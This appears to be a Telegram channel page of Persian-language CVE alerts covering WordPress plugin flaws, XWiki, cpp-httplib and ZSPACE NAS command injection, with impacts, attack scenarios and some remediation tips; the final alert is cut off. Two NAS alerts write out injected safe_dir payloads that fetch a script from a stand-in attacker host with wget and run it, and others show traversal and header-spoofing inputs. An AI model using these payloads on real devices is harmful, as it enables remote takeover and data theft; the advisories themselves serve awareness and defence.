REDTEAM CVE
525 subscribers
1.8K links
سریع‌ترین منبع برای دریافت هشدارهای امنیتی و آسیب‌پذیری‌های جدید (CVE). ما اینترنت را برای شما رصد می‌کنیم
@RedTeamAPT1
@RedTeamAPT_bot
Download Telegram
🚨 New Vulnerability Alert: CVE-2025-12851

🟠 Risk Level: HIGH (Score: 8.1)

📝 توضیحات آسیب‌پذیری:

آسیب‌پذیری با شناسه CVE-2025-12851 از نوع گنجاندن فایل محلی یا Local File Inclusion (LFI) در پلاگین وردپرسی My auctions allegro شناسایی شده است.

این ضعف امنیتی تمامی نسخه‌های این پلاگین تا نسخه 3.6.32 (و خود این نسخه) را تحت تاثیر قرار می‌دهد. مشکل اصلی در پارامتر controller نهفته است که به مهاجمان بدون نیاز به احراز هویت اجازه می‌دهد تا فایل‌های دلخواه موجود بر روی سرور را فراخوانی و محتوای آن‌ها را اجرا کنند.

💥 تاثیرات:

موفقیت در بهره‌برداری از این آسیب‌پذیری می‌تواند منجر به نتایج خطرناکی شود، از جمله:

- اجرای کد از راه دور (RCE): اگر مهاجم بتواند فایلی حاوی کدهای PHP (حتی یک فایل تصویر دستکاری‌شده) را روی سرور آپلود کند، می‌تواند با فراخوانی آن از طریق این آسیب‌پذیری، کنترل کامل وب‌سایت را به دست بگیرد.

- سرقت اطلاعات حساس: مهاجم قادر به خواندن فایل‌های حساس سرور خواهد بود، مانند فایل wp-config.php که حاوی اطلاعات اتصال به پایگاه داده است، یا سایر فایل‌های سیستمی.

- دور زدن کنترل‌های دسترسی: این آسیب‌پذیری می‌تواند برای دور زدن مکانیزم‌های امنیتی و دسترسی به بخش‌های مدیریتی یا محدود شده استفاده شود.

🎭 سناریوی حمله:

یک مهاجم ابتدا یک وب‌سایت را که از نسخه آسیب‌پذیر پلاگین My auctions allegro استفاده می‌کند، شناسایی می‌کند.

در مرحله اول، مهاجم با ارسال یک درخواست دستکاری‌شده به پارامتر controller، سعی می‌کند یک فایل حساس مانند /etc/passwd را بخواند تا اطلاعاتی درباره کاربران سیستم‌عامل سرور به دست آورد.

در یک سناریوی پیشرفته‌تر، مهاجم ابتدا یک فایل به ظاهر بی‌خطر (مانند یک تصویر آواتار) که حاوی کدهای مخرب PHP است را در قسمتی از وب‌سایت آپلود می‌کند. سپس با استفاده از همین آسیب‌پذیری LFI، مسیر آن فایل آپلود شده را در پارامتر controller قرار داده و آن را فراخوانی می‌کند. این عمل باعث اجرای کدهای مخرب PHP و دستیابی به اجرای کد از راه دور (RCE) بر روی سرور هدف می‌شود.

---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-12879

🟠 Risk Level: HIGH (Score: 8.8)

تحلیل آسیب‌پذیری: CVE-2025-12879
افزونه وردپرس: User Generator and Importer

---

Vulnerability Description:
آسیب‌پذیری از نوع Cross-Site Request Forgery (CSRF) در افزونه User Generator and Importer برای وردپرس شناسایی شده است. این ضعف امنیتی نسخه‌های 1.2.2 و پایین‌تر را تحت تأثیر قرار می‌دهد. مشکل اصلی ناشی از عدم وجود اعتبارسنجی توکن‌های امنیتی (Nonce) در عملکرد "Import Using CSV File" است.

این نقص به مهاجمان اجازه می‌دهد تا درخواست‌های جعلی را از طرف یک مدیر احراز هویت شده به وب‌سایت ارسال کنند.

Impact:
مهاجم غیر احراز هویت شده می‌تواند با سوءاستفاده از این آسیب‌پذیری، یک حساب کاربری جدید با بالاترین سطح دسترسی (Administrator) بر روی وب‌سایت هدف ایجاد کند. این امر به معنای در اختیار گرفتن کامل کنترل وب‌سایت، دسترسی به تمام اطلاعات کاربران، و امکان اجرای کدهای مخرب بر روی سرور است.

به طور خلاصه، این آسیب‌پذیری می‌تواند منجر به تسخیر کامل وب‌سایت (Full Site Compromise) شود.

Scenario:
یک سناریوی حمله محتمل به شرح زیر است:

۱. مهاجم یک صفحه وب یا لینک مخرب را آماده می‌کند که حاوی یک فرم جعلی برای ارسال درخواست به تابع آسیب‌پذیر در افزونه است. این فرم دستور ایجاد یک کاربر جدید با نام کاربری و رمز عبور دلخواه و سطح دسترسی administrator را در خود جای داده است.

۲. مهاجم با استفاده از روش‌های مهندسی اجتماعی (مانند ارسال ایمیل فیشینگ یا پیام در شبکه‌های اجتماعی)، مدیر وب‌سایت را ترغیب می‌کند تا بر روی لینک مخرب کلیک کند.

۳. زمانی که مدیر (که در همان مرورگر به پنل مدیریت وردپرس خود وارد شده است) روی لینک کلیک می‌کند، مرورگر او به صورت خودکار و پنهانی، درخواست جعلی را به همراه کوکی‌های احراز هویت به وب‌سایت ارسال می‌کند.

۴. از آنجایی که افزونه فاقد مکانیزم دفاعی CSRF (بررسی Nonce) است، درخواست را معتبر تلقی کرده و یک حساب کاربری جدید با دسترسی کامل مدیر برای مهاجم ایجاد می‌کند، بدون اینکه مدیر وب‌سایت متوجه این فرآیند شود.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-65036

🟠 Risk Level: HIGH (Score: 8.3)

شرح آسیب‌پذیری:

آسیب‌پذیری با شناسه CVE-2025-65036 در افزونه Remote Macros پلتفرم XWiki شناسایی شده است. این افزونه که برای انتقال محتوا از Confluence به XWiki استفاده می‌شود، دارای یک نقص امنیتی حیاتی است.

نقطه ضعف اصلی در این است که ماکروی مربوطه، کدهای نوشته شده با زبان قالب (Template Language) به نام Velocity را بدون بررسی سطح دسترسی کاربر اجرا می‌کند. این بدان معناست که یک کاربر غیرمجاز می‌تواند با تزریق کد مخرب در صفحات جزئیات (details pages)، آن را بر روی سرور اجرا کند.

نسخه‌های تحت تاثیر: تمامی نسخه‌ها قبل از 1.27.1
نسخه اصلاح شده: 1.27.1

---

تاثیرات:

تاثیر اصلی این آسیب‌پذیری، اجرای کد از راه دور (Remote Code Execution - RCE) است. این آسیب‌پذیری به مهاجم اجازه می‌دهد تا دستورات دلخواه خود را بر روی سروری که XWiki روی آن میزبانی می‌شود، اجرا کند.

عواقب احتمالی این حمله عبارتند از:
- کنترل کامل سرور: مهاجم می‌تواند کنترل کامل سرور را در دست بگیرد.
- سرقت اطلاعات حساس: دسترسی به پایگاه داده، فایل‌های پیکربندی و اطلاعات محرمانه کاربران.
- نصب بدافزار: امکان نصب بدافزار، باج‌افزار یا ابزارهای جاسوسی بر روی سرور.
- حملات بعدی: استفاده از سرور قربانی به عنوان پایگاهی برای حمله به سایر سیستم‌ها در شبکه داخلی.

---

سناریوی حمله:

یک مهاجم می‌تواند از این آسیب‌پذیری به شرح زیر بهره‌برداری کند:

۱. ابتدا، مهاجم یک نمونه XWiki را که از نسخه آسیب‌پذیر افزونه Remote Macros استفاده می‌کند، شناسایی می‌کند.

۲. سپس، مهاجم (حتی با یک حساب کاربری با سطح دسترسی پایین یا به عنوان کاربر مهمان در صورت پیکربندی نادرست) یک صفحه جدید ایجاد کرده یا یک صفحه موجود را ویرایش می‌کند.

۳. در این صفحه، مهاجم یک ماکروی آسیب‌پذیر را قرار داده و در پارامترهای آن یا در صفحه جزئیات مرتبط با آن، یک قطعه کد Velocity مخرب تزریق می‌کند. این کد برای اجرای یک دستور سیستمی طراحی شده است. برای مثال، کدی که یک reverse shell به سرور مهاجم برقرار می‌کند.

۴. هنگامی که این صفحه توسط هر کاربری (یا خود مهاجم) مشاهده و رندر می‌شود، ماکروی آسیب‌پذیر بدون هیچ‌گونه بررسی امنیتی، کد Velocity تزریق شده را اجرا می‌کند.

۵. در نتیجه، دستور مخرب بر روی سرور با سطح دسترسی پروسه XWiki اجرا شده و مهاجم به سرور نفوذ می‌کند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-66570

🔴 Risk Level: CRITICAL (Score: 10.0)

تحلیل آسیب‌پذیری CVE-2025-66570 در کتابخانه cpp-httplib

📝 توصیف آسیب‌پذیری:

یک آسیب‌پذیری از نوع تزریق هدر (Header Injection) در کتابخانه C++ به نام cpp-httplib (نسخه‌های قبل از 0.27.0) شناسایی شده است. مهاجم می‌تواند با ارسال هدرهای HTTP خاصی مانند REMOTE_ADDR، REMOTE_PORT، LOCAL_ADDR و LOCAL_PORT در درخواست خود، اطلاعات متادیتای سرور را دستکاری کند.

این مشکل زمانی رخ می‌دهد که کتابخانه ابتدا هدرهای ارسالی توسط مهاجم را پردازش کرده و سپس بدون حذف مقادیر تکراری، اطلاعات صحیح و داخلی خود را با همین نام‌ها به لیست هدرها اضافه می‌کند. از آنجایی که توابع مربوطه مانند get_header_value اولین مقدار پیدا شده برای یک هدر را برمی‌گردانند، مقدار جعلی تزریق شده توسط مهاجم به جای مقدار واقعی و معتبر سرور مورد استفاده قرار می‌گیرد. این تکنیک به Header Shadowing معروف است.

💥 تأثیرات:

این آسیب‌پذیری می‌تواند منجر به چندین تهدید امنیتی جدی شود:

🔸 جعل آدرس IP (IP Spoofing): مهاجم می‌تواند سرور را فریب دهد تا تصور کند درخواست از یک آدرس IP معتبر یا داخلی (مانند 127.0.0.1) ارسال شده است، در حالی که منبع واقعی درخواست جای دیگری است.

🔸 دور زدن مکانیزم‌های امنیتی (Authorization Bypass): اگر سیستم‌های کنترل دسترسی یا فایروال برنامه کاربردی (WAF) بر اساس آدرس IP کاربر تصمیم‌گیری کنند، مهاجم با جعل یک IP مجاز می‌تواند این محدودیت‌ها را دور بزند.

🔸 مسموم‌سازی لاگ‌ها (Log Poisoning): مهاجم می‌تواند اطلاعات نادرست و گمراه‌کننده را در لاگ‌های سرور ثبت کند. این کار تحلیل امنیتی و ردیابی فعالیت‌های مخرب را بسیار دشوار می‌سازد و ممکن است باعث پنهان ماندن حملات دیگر شود.

🎭 سناریو حمله:

فرض کنید یک وب اپلیکیشن با استفاده از نسخه آسیب‌پذیر cpp-httplib ساخته شده و یک پنل مدیریت دارد که دسترسی به آن فقط برای آدرس IP محلی (127.0.0.1) مجاز است.

1. مهاجم یک درخواست HTTP به سمت سرور ارسال می‌کند.
2. در این درخواست، هدر زیر را به صورت دستی اضافه می‌کند:
REMOTE_ADDR: 127.0.0.1
3. سرور درخواست را دریافت می‌کند. ابتدا هدر جعلی مهاجم را پردازش می‌کند و سپس آدرس IP واقعی مهاجم را (مثلاً 198.51.100.10) با همین نام هدر به لیست اضافه می‌کند.
4. اپلیکیشن برای بررسی دسترسی، آدرس IP کاربر را با تابع get_header_value("REMOTE_ADDR") استعلام می‌کند.
5. این تابع اولین مقدار، یعنی 127.0.0.1 را که توسط مهاجم تزریق شده، برمی‌گرداند.
6. در نتیجه، سیستم کنترل دسترسی تصور می‌کند که درخواست از یک منبع داخلی و معتبر آمده و به مهاجم اجازه ورود به پنل مدیریت را می‌دهد.

---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14106

🟠 Risk Level: HIGH (Score: 8.8)

📜 شرح آسیب‌پذیری:

یک آسیب‌پذیری حیاتی از نوع تزریق دستور (Command Injection) با شناسه CVE-2025-14106 در دستگاه‌های ذخیره‌سازی تحت شبکه (NAS) مدل ZSPACE Q2C تا نسخه 1.1.0210050 شناسایی شده است.

این ضعف امنیتی در تابع zfilev2_api.CloseSafe واقع در مسیر /v2/file/safe/close وجود دارد. مهاجم از راه دور می‌تواند با ارسال یک درخواست HTTP POST و دستکاری پارامتر safe_dir، دستورات دلخواه خود را بر روی سیستم عامل دستگاه اجرا کند. اکسپلویت این آسیب‌پذیری به صورت عمومی منتشر شده و فروشنده محصول هیچ پاسخی جهت رفع آن ارائه نکرده است.


💥 تأثیر:

مهاجمی که از این آسیب‌پذیری بهره‌برداری کند، می‌تواند به طور کامل کنترل دستگاه را در دست بگیرد. این حمله به صورت از راه دور و بدون نیاز به احراز هویت قابل اجرا است.

پیامدهای اصلی عبارتند از:
• اجرای کد از راه دور (RCE) و دسترسی کامل به سیستم.
• سرقت، حذف یا رمزنگاری تمامی داده‌های ذخیره شده بر روی دستگاه.
• نصب بدافزار (مانند باج‌افزار یا تروجان) بر روی دستگاه.
• استفاده از دستگاه به عنوان نقطه‌ای برای نفوذ به سایر سیستم‌های موجود در شبکه داخلی (Pivoting).


🎭 سناریو حمله:

۱. مهاجم یک دستگاه ZSPACE Q2C آسیب‌پذیر را در اینترنت یا شبکه داخلی شناسایی می‌کند.

۲. سپس، یک درخواست HTTP POST دستکاری‌شده به آدرس زیر ارسال می‌کند:
https://[TARGET_IP]/v2/file/safe/close

۳. در بدنه این درخواست، مقدار پارامتر safe_dir با دستورات مخرب سیستم‌عامل ترکیب می‌شود. برای مثال، برای دانلود و اجرای یک اسکریپت مخرب، مهاجم می‌تواند مقداری شبیه به این را ارسال کند:
{"safe_dir": "; wget https://malicious.server/payload -O /tmp/p; chmod +x /tmp/p; /tmp/p"}

۴. وب سرور دستگاه، این ورودی را بدون اعتبارسنجی دریافت کرده و دستورات تزریق شده توسط مهاجم را با سطح دسترسی خود اجرا می‌کند. در نتیجه، مهاجم موفق به اجرای کد از راه دور و به دست گرفتن کنترل دستگاه می‌شود.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14107

🟠 Risk Level: HIGH (Score: 8.8)

گزارش تحلیل آسیب‌پذیری | هشدار امنیتی
شناسه: CVE-2025-14107

---

📄 شرح آسیب‌پذیری:

یک ضعف امنیتی حیاتی از نوع تزریق دستور (Command Injection) در دستگاه‌های ذخیره‌سازی تحت شبکه (NAS) مدل ZSPACE Q2C تا نسخه 1.1.0210050 شناسایی شده است.

این آسیب‌پذیری در تابع zfilev2_api.SafeStatus که از طریق ارسال درخواست HTTP POST به مسیر /v2/file/safe/status قابل دسترس است، وجود دارد. مهاجم می‌تواند با دستکاری پارامتر safe_dir و تزریق دستورات مخرب، کنترل کامل سیستم‌عامل دستگاه را به دست گیرد.

حمله به صورت از راه دور قابل اجرا بوده و کد بهره‌برداری (Exploit) آن به صورت عمومی منتشر شده است. شرکت سازنده به هشدارهای امنیتی پاسخی نداده و در حال حاضر هیچ وصله امنیتی برای این مورد منتشر نشده است.

💥 سطح تأثیر:

تأثیر این آسیب‌پذیری بسیار بالا (Critical) ارزیابی می‌شود. بهره‌برداری موفقیت‌آمیز می‌تواند منجر به موارد زیر گردد:

- اجرای دستورات دلخواه از راه دور با بالاترین سطح دسترسی (root).
- سرقت، حذف و یا رمزنگاری تمامی اطلاعات ذخیره شده بر روی دستگاه.
- کنترل کامل دستگاه و استفاده از آن برای نفوذ به سایر بخش‌های شبکه داخلی (Pivoting).
- تبدیل دستگاه به بخشی از یک شبکه مخرب (Botnet) برای انجام حملات دیگر.

🎭 سناریوی حمله:

۱. مهاجم با استفاده از ابزارهای اسکن، دستگاه‌های ZSPACE Q2C آسیب‌پذیر که در اینترنت قابل دسترس هستند را شناسایی می‌کند.

۲. سپس یک درخواست HTTP POST دستکاری‌شده به سرور NAS ارسال می‌کند. در این درخواست، پارامتر safe_dir حاوی دستورات مخرب سیستم‌عامل است (برای مثال، دستوری برای دانلود و اجرای یک درب پشتی یا Backdoor).

۳. وب سرور دستگاه بدون اعتبارسنجی ورودی، دستور تزریق‌شده را مستقیماً بر روی سیستم‌عامل اجرا می‌کند.

۴. در نتیجه، مهاجم به دستگاه نفوذ کرده و کنترل کامل آن را برای سرقت اطلاعات یا اجرای حملات بعدی به دست می‌آورد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14108

🟠 Risk Level: HIGH (Score: 8.8)

گزارش تحلیل آسیب‌پذیری: CVE-2025-14108

توضیحات آسیب‌پذیری:
یک آسیب‌پذیری از نوع تزریق دستور (Command Injection) در دستگاه‌های ذخیره‌سازی تحت شبکه (NAS) مدل ZSPACE Q2C تا نسخه 1.1.0210050 شناسایی شده است. این ضعف امنیتی در تابع zfilev2_api.OpenSafe واقع در مسیر /v2/file/safe/open وجود دارد که از طریق درخواست‌های HTTP POST قابل دسترسی است.

مهاجم از راه دور می‌تواند با دستکاری پارامتر safe_dir، دستورات دلخواه خود را بر روی سیستم‌عامل دستگاه هدف اجرا کند. کد بهره‌برداری (Exploit) برای این آسیب‌پذیری به صورت عمومی منتشر شده و فروشنده محصول علی‌رغم اطلاع‌رسانی، هیچ واکنشی نشان نداده است.

---

تاثیرات:
بهره‌برداری موفق از این آسیب‌پذیری به مهاجم اجازه اجرای کد از راه دور (Remote Code Execution - RCE) را با سطح دسترسی پروسه‌ی وب سرور دستگاه می‌دهد. این موضوع می‌تواند منجر به نتایج فاجعه‌باری شود، از جمله:

- کنترل کامل دستگاه و دسترسی به تمامی فایل‌های ذخیره شده.
- سرقت و استخراج اطلاعات حساس و محرمانه کاربران.
- نصب بدافزار، باج‌افزار (Ransomware) یا ایجاد درهای پشتی (Backdoor) برای دسترسی‌های آتی.
- استفاده از دستگاه آلوده به عنوان نقطه‌ای برای نفوذ و حمله به سایر دستگاه‌های موجود در شبکه داخلی.

---

سناریوی حمله:
یک مهاجم می‌تواند با دنبال کردن مراحل زیر از این آسیب‌پذیری بهره‌برداری کند:

۱. ابتدا، مهاجم با استفاده از اسکنرهای اینترنتی، دستگاه‌های ZSPACE Q2C NAS آسیب‌پذیر را که به صورت عمومی در دسترس هستند، شناسایی می‌کند.

۲. سپس، یک درخواست HTTP POST مخرب به اندپوینت /v2/file/safe/open ارسال می‌کند. در این درخواست، مقدار پارامتر safe_dir به گونه‌ای دستکاری می‌شود که شامل دستورات سیستم‌عامل باشد. برای مثال:
safe_dir=any_directory_name; wget https://attacker.com/shell.sh -O /tmp/shell.sh; chmod +x /tmp/shell.sh; /tmp/shell.sh

۳. وب سرور دستگاه بدون اعتبارسنجی کافی، این ورودی را پردازش کرده و دستورات تزریق شده توسط مهاجم را بر روی سیستم اجرا می‌کند. این عمل منجر به دانلود و اجرای یک شل مخرب بر روی دستگاه NAS می‌شود.

۴. در نهایت، مهاجم از طریق شل ایجاد شده، کنترل کامل دستگاه را در دست گرفته و می‌تواند اقدامات خرابکارانه خود را آغاز کند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-12673

🔴 Risk Level: CRITICAL (Score: 9.8)

🐞 شرح آسیب‌پذیری:

یک آسیب‌پذیری حیاتی از نوع آپلود فایل دلخواه (Arbitrary File Upload) با شناسه CVE-2025-12673 در پلاگین Flex QR Code Generator برای وردپرس شناسایی شده است. تمام نسخه‌های این پلاگین تا نسخه 1.2.6 (شامل این نسخه) تحت تأثیر این ضعف امنیتی قرار دارند.

این آسیب‌پذیری ناشی از عدم وجود اعتبارسنجی صحیح برای نوع فایل‌ها در تابع update_qr_code() است. این نقص به مهاجمان احراز هویت نشده اجازه می‌دهد تا هر نوع فایلی (مانند یک وب‌شل مخرب) را بر روی سرور سایت آسیب‌پذیر آپلود کنند.

💥 تأثیر:

مهم‌ترین و خطرناک‌ترین پیامد این آسیب‌پذیری، امکان اجرای کد از راه دور (Remote Code Execution - RCE) است. یک مهاجم با بهره‌برداری موفق از این ضعف امنیتی می‌تواند کنترل کامل سرور را به دست آورد.

سایر تأثیرات احتمالی عبارتند از:
- سرقت اطلاعات حساس کاربران، پایگاه داده و فایل‌های پیکربندی.
- نصب بدافزار، باج‌افزار یا استفاده از سرور برای حملات DDoS.
- تغییر چهره وب‌سایت (Defacement) و آسیب به اعتبار برند.
- ایجاد دسترسی‌های پایدار (Backdoor) برای حملات آینده.

🎬 سناریو:

یک سناریوی حمله می‌تواند به شرح زیر باشد:

۱. مهاجم با ابزارهای اسکن خودکار، وب‌سایت‌های وردپرسی را که از نسخه آسیب‌پذیر پلاگین `Flex QR Code Generator` استفاده می‌کنند، شناسایی می‌کند.

۲. سپس، یک فایل مخرب مانند یک وب‌شل (Web Shell) با پسوند .php آماده می‌کند. این فایل حاوی کدهایی است که به مهاجم اجازه اجرای دستورات روی سرور را می‌دهد.

۳. مهاجم با ارسال یک درخواست دستکاری‌شده به تابع آسیب‌پذیر update_qr_code()، فایل وب‌شل خود را بدون نیاز به هیچ‌گونه نام کاربری یا رمز عبور، بر روی سرور آپلود می‌کند.

۴. پس از آپلود موفقیت‌آمیز، مهاجم آدرس مستقیم فایل آپلود شده را در مرورگر خود باز می‌کند. سرور وب، کدهای PHP موجود در فایل را اجرا کرده و در نتیجه، مهاجم به یک رابط کاربری برای اجرای دستورات دلخواه روی سرور دسترسی پیدا می‌کند و کنترل کامل آن را در اختیار می‌گیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-13377

🔴 Risk Level: CRITICAL (Score: 9.6)

تحلیل آسیب‌پذیری | حذف پوشه دلخواه در افزونه 10Web Booster وردپرس
شناسه: CVE-2025-13377

📄 توضیحات آسیب‌پذیری:
آسیب‌پذیری از نوع "حذف پوشه دلخواه" (Arbitrary Folder Deletion) در افزونه محبوب وردپرس با نام 10Web Booster – Website speed optimization, Cache & Page Speed optimizer شناسایی شده است.

این ضعف امنیتی در تمام نسخه‌های 2.32.7 و پایین‌تر وجود دارد. مشکل اصلی از تابع get_cache_dir_for_page_from_url() نشأت می‌گیرد که در آن، اعتبارسنجی مسیر فایل به درستی انجام نمی‌شود.

این نقص به مهاجمان احرازهویت شده (حتی با کمترین سطح دسترسی مانند Subscriber) اجازه می‌دهد تا پوشه‌های دلخواه را روی سرور حذف کنند.

💥 تاثیرات:
بهره‌برداری موفق از این آسیب‌پذیری می‌تواند منجر به عواقب جدی برای وب‌سایت شود، از جمله:

🔻 از دست رفتن داده‌ها (Data Loss): مهاجم می‌تواند پوشه‌های حیاتی مانند wp-content/uploads که حاوی فایل‌های رسانه‌ای کاربران است را حذف کند.

🔻 از کار افتادن سرویس (Denial of Service - DoS): با حذف پوشه‌های اصلی وردپرس مانند wp-admin یا wp-includes، وب‌سایت به طور کامل از دسترس خارج شده و دچار اختلال در سرویس‌دهی می‌شود.

🔻 آسیب به یکپارچگی سایت: حذف پوشه‌های مربوط به قالب‌ها (themes) یا سایر افزونه‌ها (plugins) می‌تواند ساختار و عملکرد سایت را مختل کند.

🎭 سناریو حمله:
یک مهاجم با سطح دسترسی Subscriber (مشترک) وارد وب‌سایت هدف می‌شود. سپس با ارسال یک درخواست دستکاری‌شده به سرور که تابع آسیب‌پذیر را فراخوانی می‌کند، از تکنیک پیمایش مسیر (Path Traversal) مانند ../ استفاده می‌کند تا مسیر یک پوشه حیاتی را هدف قرار دهد.

برای مثال، مهاجم می‌تواند درخواستی ارسال کند که باعث شود سرور مسیر /wp-content/plugins/10web-booster/cache/../../../../wp-admin/ را به عنوان مسیر حذف کش در نظر بگیرد.

به دلیل عدم اعتبارسنجی صحیح، افزونه فریب خورده و به جای پوشه کش، پوشه حیاتی wp-admin را به طور کامل حذف می‌کند. در نتیجه، پنل مدیریت وردپرس از دسترس خارج شده و سایت با اختلال جدی مواجه می‌شود.

---

توصیه‌های امنیتی:

🔸 فوراً افزونه 10Web Booster را به آخرین نسخه منتشر شده به‌روزرسانی کنید.

🔸 در صورتی که به‌روزرسانی در دسترس نیست، این افزونه را تا زمان ارائه وصله امنیتی، غیرفعال و حذف نمایید.

🔸 همواره از فایل‌ها و پایگاه داده وب‌سایت خود نسخه پشتیبان تهیه کنید.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-12966

🟠 Risk Level: HIGH (Score: 8.8)

تحلیل آسیب‌پذیری CVE-2025-12966
افزونه All-in-One Video Gallery وردپرس

📌 شرح آسیب‌پذیری:

یک آسیب‌پذیری حیاتی از نوع آپلود فایل دلخواه (Arbitrary File Upload) در افزونه All-in-One Video Gallery برای وردپرس شناسایی شده است. این نقص امنیتی نسخه‌های 4.5.4 تا 4.5.7 این افزونه را تحت تأثیر قرار می‌دهد.

نقطه ضعف اصلی، عدم اعتبارسنجی صحیح نوع فایل (File Type Validation) در تابع resolve_import_directory() است. این حفره به مهاجمان احرازهویت‌شده با سطح دسترسی "نویسنده" (Author) و بالاتر اجازه می‌دهد تا فایل‌های دلخواه خود، از جمله فایل‌های اجرایی مخرب، را بر روی سرور سایت آسیب‌پذیر آپلود کنند.

💥 تأثیر:

تأثیر اصلی این آسیب‌پذیری، اجرای کد از راه دور (Remote Code Execution - RCE) است. مهاجم با آپلود یک فایل مخرب (مانند یک وب‌شل - Web Shell) می‌تواند کنترل کامل سرور میزبان وب‌سایت را در دست بگیرد.

پیامدهای این حمله می‌تواند شامل موارد زیر باشد:
- سرقت اطلاعات حساس کاربران و پایگاه داده
- تغییر ظاهر سایت (Defacement)
- استفاده از سرور برای حملات بیشتر (مانند حملات DDoS یا ارسال هرزنامه)
- نصب بدافزار و استخراج ارز دیجیتال (Cryptojacking)

🕵️‍♂️ سناریوی حمله:

۱. مهاجم ابتدا یک حساب کاربری با سطح دسترسی "نویسنده" (Author) یا بالاتر در سایت وردپرسی هدف به دست می‌آورد. (این کار می‌تواند از طریق فیشینگ، حملات Brute-force یا سوءاستفاده از یک حساب کاربری قانونی انجام شود).

۲. سپس، یک فایل مخرب مانند یک وب‌شل با پسوند .php آماده می‌کند. این فایل حاوی کدهایی برای اجرای دستورات روی سرور است.

۳. مهاجم با استفاده از قابلیت آسیب‌پذیر در افزونه، فایل shell.php خود را آپلود می‌کند. به دلیل نبود اعتبارسنجی، سیستم فایل مخرب را می‌پذیرد.

۴. پس از آپلود موفقیت‌آمیز، مهاجم آدرس مستقیم فایل آپلود شده را پیدا کرده و آن را در مرورگر خود باز می‌کند.

۵. با باز شدن آدرس، کدهای مخرب روی سرور اجرا شده و مهاجم به سرور دسترسی کامل پیدا می‌کند و می‌تواند هر دستوری را اجرا نماید.

---

💡 توصیه‌های امنیتی:

- به‌روزرسانی فوری: در اسرع وقت افزونه All-in-One Video Gallery را به آخرین نسخه امن منتشر شده آپدیت کنید.

- مدیریت دسترسی: سطح دسترسی کاربران را بازبینی کرده و از اعطای دسترسی‌های غیرضروری به کاربران نامعتبر خودداری کنید.

- استفاده از WAF: یک فایروال برنامه وب (Web Application Firewall) می‌تواند به شناسایی و مسدودسازی تلاش‌ها برای آپلود فایل‌های مخرب کمک کند.

- بررسی فایل‌ها: سرور خود را برای یافتن هرگونه فایل مشکوک و ناشناس، به‌ویژه در پوشه‌های آپلود، اسکن کنید.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-13065

🟠 Risk Level: HIGH (Score: 8.8)

گزارش تحلیل آسیب‌پذیری: CVE-2025-13065

📝 توضیح آسیب‌پذیری:
افزونه Starter Templates برای وردپرس در تمامی نسخه‌ها تا نسخه 4.4.41 (شامل این نسخه) دارای آسیب‌پذیری از نوع آپلود فایل دلخواه (Arbitrary File Upload) است. علت اصلی این مشکل، اعتبارسنجی ناکافی نوع فایل‌های WXR است. این نقص به مهاجم اجازه می‌دهد تا با استفاده از فایل‌هایی با پسوند دوگانه (مانند file.php.xml)، مکانیزم‌های امنیتی را دور زده و فایل مخرب خود را به عنوان یک فایل WXR معتبر آپلود کند. این آسیب‌پذیری به مهاجمان احرازهویت‌شده با سطح دسترسی نویسنده (author) و بالاتر، امکان آپلود فایل‌های دلخواه روی سرور سایت را می‌دهد که می‌تواند منجر به اجرای کد از راه دور (Remote Code Execution) شود.

💥 تأثیرات و پیامدها:
مهم‌ترین پیامد این آسیب‌پذیری، امکان اجرای کد از راه دور (RCE) است. این بدان معناست که مهاجم می‌تواند کنترل کامل وب‌سایت و سرور میزبان را به دست گیرد. سایر پیامدهای احتمالی عبارتند از: سرقت اطلاعات حساس کاربران و پایگاه داده، نصب بدافزار و درب‌های پشتی (Backdoors) برای دسترسی‌های آتی، و سوءاستفاده از سرور برای حملات دیگر مانند DDoS یا استخراج رمزارز.

👨‍💻 سناریوی حمله:
یک مهاجم با سطح دسترسی کاربری حداقل author وارد پیشخوان وردپرس می‌شود.

مهاجم یک فایل مخرب (مانند یک وب‌شل به زبان PHP) ایجاد کرده و نام آن را با پسوند دوگانه ذخیره می‌کند؛ برای مثال: shell.php.xml.

سپس با استفاده از قابلیت ایمپورت در افزونه Starter Templates، اقدام به آپلود این فایل جعلی می‌کند.

به دلیل ضعف در اعتبارسنجی، افزونه فریب خورده و فایل را به عنوان یک فایل .xml معتبر شناسایی و روی سرور آپلود می‌کند.

در نهایت، مهاجم با دسترسی مستقیم به آدرس فایل آپلود شده، کد مخرب خود را روی سرور اجرا کرده و به وب‌سایت و سرور تسلط کامل پیدا می‌کند.

---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14126

🟠 Risk Level: HIGH (Score: 8.8)

گزارش تحلیل آسیب‌پذیری: CVE-2025-14126

🔎 شرح آسیب‌پذیری:

